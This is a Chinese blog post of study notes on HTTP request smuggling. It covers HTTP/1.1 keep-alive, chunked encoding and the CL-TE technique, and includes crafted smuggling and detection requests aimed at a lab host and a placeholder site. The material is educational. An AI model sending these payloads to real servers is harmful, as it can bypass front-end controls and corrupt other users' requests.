<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo_32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo_16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"twe1v3.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="这是一些关于HTTP请求走私的一些学习笔记和总结，也有一些借鉴，Copy啦！QwQ~&#x3D;&#x3D;&#x3D;&#x3D;">
<meta property="og:type" content="article">
<meta property="og:title" content="HTTP请求走私">
<meta property="og:url" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/index.html">
<meta property="og:site_name" content="TWe1v3">
<meta property="og:description" content="这是一些关于HTTP请求走私的一些学习笔记和总结，也有一些借鉴，Copy啦！QwQ~&#x3D;&#x3D;&#x3D;&#x3D;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126132239777.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126132324467.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721172714-166930312604254.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126110216153.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721193923.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721193726.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721203309.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721213930.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721221139.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721221407.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721221816.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721223313.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721223504.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724145918.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724150746.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724150855.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724151412.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724151656.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724152230.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724164032.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724164602.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724164644.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724173247.png">
<meta property="article:published_time" content="2022-11-24T08:58:41.448Z">
<meta property="article:modified_time" content="2022-11-26T05:57:07.932Z">
<meta property="article:author" content="TWe1v3">
<meta property="article:tag" content="技术总结">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126132239777.png">


<link rel="canonical" href="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":"","permalink":"http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/","path":"2022/11/浅谈Http请求走私/","title":"HTTP请求走私"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>HTTP请求走私 | TWe1v3</title>
  





<script src="/lib/fireworks.js"></script>
  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">TWe1v3</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于TWe1v3</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>文章标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>文章分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>时间轴</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B5%85%E8%B0%88http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81"><span class="nav-number">1.</span> <span class="nav-text"> 浅谈HTTP请求走私</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%A7%E7%94%9F%E5%8E%9F%E5%9B%A0"><span class="nav-number">1.1.</span> <span class="nav-text"> 产生原因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.2.</span> <span class="nav-text"> 前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#http11%E7%9A%84%E7%89%B9%E6%80%A7"><span class="nav-number">1.2.1.</span> <span class="nav-text"> HTTP&#x2F;1.1的特性</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#keep-alive"><span class="nav-number">1.2.1.1.</span> <span class="nav-text"> Keep-Alive</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%AF%E6%8C%81pipeline"><span class="nav-number">1.2.1.2.</span> <span class="nav-text"> 支持pipeline</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AF%B9%E4%BA%8Ekeep-alive%E6%A8%A1%E5%BC%8F%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E8%AF%B7%E6%B1%82%E6%89%80%E5%BE%97%E5%88%B0%E7%9A%84%E5%93%8D%E5%BA%94%E6%95%B0%E6%8D%AE%E5%B7%B2%E7%BB%8F%E6%8E%A5%E6%94%B6%E5%AE%8C%E6%88%90"><span class="nav-number">1.2.2.</span> <span class="nav-text"> 对于Keep-Alive模式，如何判断请求所得到的响应数据已经接收完成</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#conent-length"><span class="nav-number">1.2.2.1.</span> <span class="nav-text"> Conent-Length</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#transfer-encoding"><span class="nav-number">1.2.2.2.</span> <span class="nav-text"> Transfer-Encoding</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E5%9D%97%E7%BC%96%E7%A0%81transfer-encoding-chunked"><span class="nav-number">1.2.3.</span> <span class="nav-text"> 分块编码（Transfer-Encoding: chunked）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%87%A0%E7%A7%8D%E8%B5%B0%E7%A7%81%E7%B1%BB%E5%9E%8B"><span class="nav-number">1.3.</span> <span class="nav-text"> 几种走私类型</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#cl-te"><span class="nav-number">1.3.1.</span> <span class="nav-text"> CL-TE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#te-cl"><span class="nav-number">1.3.2.</span> <span class="nav-text"> TE-CL</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#te-te"><span class="nav-number">1.3.3.</span> <span class="nav-text"> TE-TE</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.4.</span> <span class="nav-text"> 利用HTTP请求走私漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#bypass%E5%89%8D%E7%AB%AF%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%AE%89%E5%85%A8%E9%AA%8C%E8%AF%81"><span class="nav-number">1.4.1.</span> <span class="nav-text"> Bypass前端服务器安全验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%89%8D%E7%AB%AF%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%AF%B9%E8%AF%B7%E6%B1%82%E7%9A%84%E9%87%8D%E5%86%99%E6%83%85%E5%86%B5"><span class="nav-number">1.4.2.</span> <span class="nav-text"> 获取前端服务器对请求的重写情况</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%85%B6%E4%BB%96%E7%94%A8%E6%88%B7%E7%9A%84cookie"><span class="nav-number">1.4.3.</span> <span class="nav-text"> 获取其他用户的cookie</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#http-header%E5%AF%BC%E8%87%B4%E7%9A%84xss"><span class="nav-number">1.4.4.</span> <span class="nav-text"> HTTP header导致的XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%86%E9%87%8D%E5%AE%9A%E5%90%91%E8%BD%AC%E5%8F%98%E4%B8%BA%E4%BB%BB%E6%84%8F%E9%87%8D%E5%AE%9A%E5%90%91"><span class="nav-number">1.4.5.</span> <span class="nav-text"> 将重定向转变为任意重定向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%93%E5%AD%98%E6%8A%95%E6%AF%92"><span class="nav-number">1.4.6.</span> <span class="nav-text"> 缓存投毒</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%93%E5%AD%98%E6%AC%BA%E9%AA%97"><span class="nav-number">1.4.7.</span> <span class="nav-text"> 缓存欺骗</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="TWe1v3"
      src="/images/twe1v3.gif">
  <p class="site-author-name" itemprop="name">TWe1v3</p>
  <div class="site-description" itemprop="description">TWe1v3的博客</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/TWe1v3" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;TWe1v3" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:twe1v3@qq.com" title="E-Mail → mailto:twe1v3@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.csdn.net/weixin_44450575" title="https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_44450575" rel="noopener" target="_blank">sight's CSDN</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.coolcalo.top/" title="http:&#x2F;&#x2F;www.coolcalo.top&#x2F;" rel="noopener" target="_blank">coolcalo'blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.t0mrvvi1b3t.top/" title="http:&#x2F;&#x2F;www.t0mrvvi1b3t.top&#x2F;" rel="noopener" target="_blank">t0mr'blog</a>
        </li>
    </ul>
  </div>

        </div>
      </div>

    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://twe1v3.github.io/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/twe1v3.gif">
      <meta itemprop="name" content="TWe1v3">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TWe1v3">
      <meta itemprop="description" content="TWe1v3的博客">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="HTTP请求走私 | TWe1v3">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HTTP请求走私
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-11-24 16:58:41" itemprop="dateCreated datePublished" datetime="2022-11-24T16:58:41+08:00">2022-11-24</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-11-26 13:57:07" itemprop="dateModified" datetime="2022-11-26T13:57:07+08:00">2022-11-26</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/" itemprop="url" rel="index"><span itemprop="name">技术分享</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>6.1k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>6 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>这是一些关于HTTP请求走私的一些学习笔记和总结，也有一些借鉴，Copy啦！QwQ~<code>====</code></p>
<span id="more"></span>
<h1 id="浅谈http请求走私"><a class="markdownIt-Anchor" href="#浅谈http请求走私"></a> 浅谈HTTP请求走私</h1>
<hr>
<p>​                                                                                                                                                        <strong>--------------TWe1v3</strong></p>
<p>本文主要针对HTTP/1.1协议的请求走私做一些讲解，不涉及HTTP/2.0、HTTP/3.0的相关技术。不过这里可以说一下HTTP和HTTPS的一些差别：</p>
<blockquote>
<p><strong>HTTP与HTTPS不同</strong></p>
<ul>
<li>HTTPS需要CA（Certificate Authority，数字证书认证机构） 申请证书，免费的很少</li>
<li>HTTP默认80端口；HTTPS默认443端口</li>
<li>HTTP使用http标识符；HTTPS使用https标识符</li>
<li>HTTP是明文传输；HTTPS是加密传输</li>
<li>HTTP响应比HTTPS快，因为HTTPS还需要TSL握手，所以HTTPS更耗费服务器资源</li>
</ul>
</blockquote>
<h2 id="产生原因"><a class="markdownIt-Anchor" href="#产生原因"></a> 产生原因</h2>
<p>当今的 Web 应用程序经常在用户和最终应用程序逻辑之间采用 HTTP 服务器链。用户将请求发送到 前端服务器（有时称为负载平衡器或反向代理），此服务器将请求转发到一个或多个后端服务器。 这种类型的架构在现代基于云的应用程序中越来越普遍，在某些情况下是不可避免的。</p>
<p>当前端服务器将 HTTP 请求转发到后端服务器时，它通常会通过同一后端网络发送多个请求 连接，因为这更加高效和高性能。协议非常简单：HTTP请求一个接一个地发送，并且 接收服务器解析 HTTP 请求标头，以确定一个请求的结束位置和下一个请求的开始位置：</p>
<p><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126132239777.png" alt="image-20221126132239777"></p>
<p><strong>原因</strong>:当网站使用两个服务器（一个前端，一个后端）来处理用户所提交的数据，而两个服务器之间对HTTP header的处理不一致，就可能产生HTTP走私问题。</p>
<blockquote>
<p>现在的Web应用程序经常在用户和最终的应用程序之间使用HTTP服务器链。用户将请求发送到前端服务器（有时称为负载平衡器或反向代理，也可能是WAF），并且该服务器将请求转发到一个或多个后端服务器。</p>
</blockquote>
<p><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126132324467.png" alt="image-20221126132324467"></p>
<h2 id="前置知识"><a class="markdownIt-Anchor" href="#前置知识"></a> 前置知识</h2>
<h3 id="http11的特性"><a class="markdownIt-Anchor" href="#http11的特性"></a> HTTP/1.1的特性</h3>
<h4 id="keep-alive"><a class="markdownIt-Anchor" href="#keep-alive"></a> Keep-Alive</h4>
<p>Keep-Alive（又称持久连接），在<code>HTTP/1.1</code>中，默认使用启用Keep-Alive，Keep-Alive功能使客户端到服务器端的连接持续有效，同一对客户/服务器之间的后续请求和响应可以通过这个连接发送。</p>
<h4 id="支持pipeline"><a class="markdownIt-Anchor" href="#支持pipeline"></a> 支持pipeline</h4>
<p><code>HTTP/1.1</code>允许在持久连接上可选地使用请求管道（意味pipeline是依赖于持久连接的，而不是独立的）。pipeline请求管道可以在响应到达之前，将多条请求放入队列，但对于pipeline的请求顺序和响应顺序是相对应的。</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721172714.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721172714-166930312604254.png" alt="img"></a></p>
<h3 id="对于keep-alive模式如何判断请求所得到的响应数据已经接收完成"><a class="markdownIt-Anchor" href="#对于keep-alive模式如何判断请求所得到的响应数据已经接收完成"></a> 对于Keep-Alive模式，如何判断请求所得到的响应数据已经接收完成</h3>
<h4 id="conent-length"><a class="markdownIt-Anchor" href="#conent-length"></a> Conent-Length</h4>
<p>Conent-Length表示实体内容长度，当客户端向服务器请求一个静态页面或者一张图片时，服务器可以很清楚的知道内容大小，然后通过Content-length消息首部字段告诉客户端 需要接收多少数据。</p>
<h4 id="transfer-encoding"><a class="markdownIt-Anchor" href="#transfer-encoding"></a> Transfer-Encoding</h4>
<p>分块编码，数据分解成一系列数据块，并以一个或多个块发送，这样服务器可以发送数据而不需要预先知道发送内容的总大小。</p>
<h3 id="分块编码transfer-encoding-chunked"><a class="markdownIt-Anchor" href="#分块编码transfer-encoding-chunked"></a> 分块编码（Transfer-Encoding: chunked）</h3>
<ol>
<li>在头部加入 Transfer-Encoding: chunked 之后，就代表这个报文采用了分块编码。这时，报文中的实体需要改为用一系列分块来传输。</li>
<li>每个分块包含十六进制的长度值和数据，长度值独占一行，长度不包括它结尾的 CRLF(\r\n)，也不包括分块数据结尾的 CRLF(\r\n)。</li>
<li>最后一个分块长度值必须为 0，对应的分块数据没有内容，表示实体结束。</li>
</ol>
<p>例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Content-Type: text/plain</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">25\r\n</span><br><span class="line">This is the data in the first chunk\r\n</span><br><span class="line"></span><br><span class="line">1C\r\n</span><br><span class="line">and this is the second one\r\n</span><br><span class="line"></span><br><span class="line">3\r\n</span><br><span class="line">con\r\n</span><br><span class="line"></span><br><span class="line">0\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>
<h2 id="几种走私类型"><a class="markdownIt-Anchor" href="#几种走私类型"></a> 几种走私类型</h2>
<h3 id="cl-te"><a class="markdownIt-Anchor" href="#cl-te"></a> CL-TE</h3>
<p>前端服务器使用Content-Length头，而后端服务器使用Transfer-Encoding头。</p>
<p>发送两次请求，当第二次请求时出现HTTP方式错误，则存在走私问题。实验截图：</p>
<p><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/image-20221126110216153.png" alt="image-20221126110216153"></p>
<p>原因就是第一次前端服务器解析时，使用Content-Length头判断结束，所以传给后端服务器的数据为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">0\r\n</span><br><span class="line">\r\n</span><br><span class="line">G</span><br></pre></td></tr></table></figure>
<p>总共加起来为6，而后端服务器以 Transfer-Encoding: chunked 判断结束，当遇到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>
<p>在分块传输中，则代表结束，而后面的 <code>G</code> ，服务器判断未完成的请求，将遗留在缓存中，所以当第二次请求时，接在了 <code>G</code> 的后面，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GPOST / HTTP/1.1</span><br><span class="line">Host:  0a10004c04fa2400c0c96f4b00440076.web-security-academy.net</span><br><span class="line">Connection: close</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>这就完成了一次成功的请求走私<br>
在实际情况中是不会出现HTTP请求方式错误的，可以通过<strong>时间延迟</strong>来判断是否存在CL-TE类型的走私问题：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: vulnerable-website.com</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Content-Length: 4</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">A</span><br><span class="line">X</span><br></pre></td></tr></table></figure>
<p>如果存在走私问题，下一个请求就会有明显的延迟。</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721193923.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721193923.png" alt="img"></a></p>
<p>或者使用下面的payload进行验证，如果存在走私问题，则会<strong>返回错误</strong>的页面：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">POST /search HTTP/1.1</span><br><span class="line">Host: vulnerable-website.com</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 29</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line">GET /404 HTTP/1.1</span><br><span class="line">Foo: x</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721193726.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721193726.png" alt="img"></a></p>
<ul>
<li>注意<br>
由于前端服务器处理Content-Length，需要把我们所有的内容都发送到后端服务器中去，那这个Content-Length可以用Brupsuite自动计算。</li>
</ul>
